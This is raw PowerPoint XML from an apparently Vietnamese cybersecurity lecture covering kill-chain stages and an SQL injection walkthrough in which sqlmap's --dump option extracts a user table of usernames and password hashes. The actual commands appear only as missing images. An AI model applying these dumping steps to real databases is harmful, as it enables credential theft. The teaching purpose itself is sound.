                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cặp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Hashed Password:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F27F6B7-A6D9-01B7-F531-84FF949CB595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1359178"/>
            <a:ext cx="6705600" cy="4156634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787487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9448-3A5D-3FDF-887F-E84FF362195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E248C0C-703D-746E-654E-1B606CFD894E}"/>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9743B5D-0587-43C4-9C71-5C416D540732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> bao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>gồm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>giai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cốt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{467825AB-448E-AC1B-CD31-997A4E4FB7D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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C49AFD-8A40-C712-063A-80CC25755C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1638300"/>
            <a:ext cx="8229600" cy="297773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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. Command and Control (Chỉ huy và Điều khiển): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thiết lập kênh liên lạc với máy chủ điều khiển từ xa để nhận lệnh và gửi dữ liệu đánh cắp.</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6. Actions on Objectives (Hành động trên mục tiêu): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thực hiện mục tiêu cuối cùng (đánh cắp dữ liệu, phá hủy hệ thống, tống tiền).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12134139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1438-A6EB-98ED-8E0F-184231C0659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592B4FE-F27F-FBFE-3615-FD21794B78F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1C493DB-9FF4-40EE-2DD7-78DF59DD3E1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130</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB7306A-3355-2847-C868-09AC246E52F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đây là bước mở rộng của chuỗi tấn công SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</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Mục đích của câu lệnh là yêu cầu sqlmap trích xuất toàn bộ dữ liệu (dump)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thi</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D9BA60-387D-4696-B628-5A769ED4F2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="2629554"/>
            <a:ext cx="8832482" cy="1828143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31150254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16CAE-FBF4-8F21-4245-CDEDA4D3E1E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D197F8B-62FA-C850-BDF4-0B205F0B9DB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1089160-C633-D7A8-F548-791BCB5792B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131</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE63533F-F949-6E35-BEE0-BD52437EAB21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Tham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>--dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>yêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> user</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975E8FFD-318F-E3D8-CD16-3D157B6176E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12700" y="1416618"/>
            <a:ext cx="9131300" cy="3348407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16897448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412C1-AE10-6634-CB6B-EA9B249E8D0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915984F-D894-E0C5-0533-2040FBFFF6F4}"/>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48D97D0-3635-6144-82E2-5CA574C0877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132</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CAE9A3-186C-86DD-80DA-337A25A832EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cuối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ASCII) </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
